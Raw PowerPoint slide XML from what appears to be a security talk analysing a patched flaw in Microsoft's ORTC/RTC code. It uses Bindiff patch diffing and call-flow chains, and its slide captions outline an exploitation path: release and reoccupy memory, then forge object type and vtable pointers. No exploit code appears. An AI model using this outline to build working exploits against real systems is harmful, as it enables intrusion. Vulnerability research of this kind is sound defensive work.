          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396328" y="2601789"/>
            <a:ext cx="1568287" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cache pointer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78BAE11F-B74B-4B57-AADB-3A65718B6500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4987933" y="6170531"/>
            <a:ext cx="3718382" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forged object Type and virtual table pointer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B6CB61-E017-4064-866E-BF636F096922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8484756" y="9330503"/>
            <a:ext cx="3664932" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual function modifies data structure</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{618B833A-9BE5-4EC8-A2B4-840908F2D96A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6790301" y="4332353"/>
            <a:ext cx="2484246" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release and occupy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204333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7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27" grpId="0" animBg="1"/>
      <p:bldP spid="49" grpId="0" animBg="1"/>
      <p:bldP spid="55" grpId="0" animBg="1"/>
      <p:bldP spid="64" grpId="0" animBg="1"/>
      <p:bldP spid="70" grpId="0" animBg="1"/>
      <p:bldP spid="74" grpId="0" animBg="1"/>
      <p:bldP spid="81" grpId="0" animBg="1"/>
      <p:bldP spid="2" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33"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5082535" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bindiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RTC related patches</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ABEC6B2-BC84-4654-9F4D-3CFF1B3AABA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3163019"/>
            <a:ext cx="10856433" cy="2401553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4972C2C-95A8-45F8-A9C4-099CBAA83790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078123" y="5719195"/>
            <a:ext cx="10904945" cy="2820372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{584DAAE5-CEE7-405D-AF7E-D341041162CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078123" y="8719339"/>
            <a:ext cx="11098383" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New function ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClearModernArrayVarsIfNecessary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1588172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32554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who called ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClearModernArrayVarsIfNecessary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96D25E18-7BAE-45DA-9DCD-A43E266BE58D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3019569"/>
            <a:ext cx="10904943" cy="1975779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4566A7A9-4973-4E6B-8FCC-3249DAE150B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1029612" y="5017278"/>
            <a:ext cx="10953455" cy="4515210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function call flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRTCRtpReceiver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Var_receive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/send	-&gt; ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackRTCRtpParametersFromVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackSequenceOfDictionaryFromVarEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClearModernArrayVarsIfNecessary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRTCIceTransport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Var_setRemoteCandidates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackSequenceOfDictionaryFromVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackArrayObjectVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClearModernArrayVarsIfNecessary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are many ways to call. Take the second as an example. Why add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClearModernArrayVarsIfNecessary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4007793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32554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the patch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackSequenceOfDictionaryFromVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CE4E661-C56F-4066-AE2B-3024C3C286CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3323469"/>
            <a:ext cx="10953455" cy="2830079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04781514-734F-438E-8BD9-7D0D6C569877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="6176500"/>
            <a:ext cx="7039684" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the patch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClearModernArrayVarsIfNecessary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE53B39-D94C-4FF9-ABB7-06594C0CB57D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107795" y="6830661"/>
            <a:ext cx="10923785" cy="2271582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57844650-E2AC-465E-9471-89967B304D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290940" y="5598125"/>
            <a:ext cx="4601860"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F2AF8654-24E1-4BEF-9C9C-0AD07E8B2C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398018" y="7966452"/>
            <a:ext cx="3173982"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33128726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61665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before the patch, the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackSequenceOfDictionaryFromVar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45F0DDD-059C-4059-8C3E-A281EDC6345C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6517021" y="3111368"/>
            <a:ext cx="5514559" cy="3275784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E88B035-E0F4-4939-983A-F39D15CE7451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070593" y="6282042"/>
            <a:ext cx="5438897" cy="1790276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DBCBB52-D618-4AF5-86E5-25372F649CC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
